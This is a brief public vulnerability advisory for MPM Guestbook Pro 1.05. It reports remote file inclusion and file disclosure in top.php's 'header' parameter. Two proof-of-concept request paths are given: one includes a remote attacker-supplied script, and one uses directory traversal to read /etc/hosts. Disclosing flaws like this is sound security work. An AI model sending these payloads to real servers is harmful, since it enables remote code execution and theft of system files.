__ ___/____ __________ /____________ _____ ___/______________ _____________ _____ \__ / / /_ ___/ __/ _ \_ __ `__ \____ \_ _ \ ___/ / / /_ ___/ _ \ ____/ /_ /_/ /_(__ )/ /_ / __/ / / / / /___/ // __/ /__ / /_/ /_ / / __/ /____/ _\__, / /____/ \__/ \___//_/ /_/ /_//____/ \___/\___/ \__,_/ /_/ \___/ /____/ ____________________ _ _ __ \_ ___/_ __ `/ ___/ /_/ / / _ /_/ / _(_)____//_/ _\__, / /____/ Ref: SS#11012005 SYSTEMSECURE.ORG - Advisory/Exploit * PUBLIC ADVISORY * Software: MPM Guestbook Pro 1.05 (maybe all versions) Link: http://mpm.pahviloota.net/ Attacks: Remote File Include and File Disclusore Discovered by: SmOk3 [smok3f00@gmail.com] Vendor: Warned about this vulnerability -- ! Description !-- MPM Guestbook Pro is a famous php Guestbook system. This script allows malicious users to include arbitrary script code from remote. This may expose sensitive information and compromise the entire system. The problem is in the file "top.php", in the first lines: PoC: /gbpro/top.php?header=http://[CMD] Also, you can view any file in the system, due to file disclure on the same variable. PoC: /gbpro/top.php?header=../../../../../../../etc/hosts -- ! Solution !-- No patch available yet. Rm9y52EgUG9ydHVnYWw= -EOF-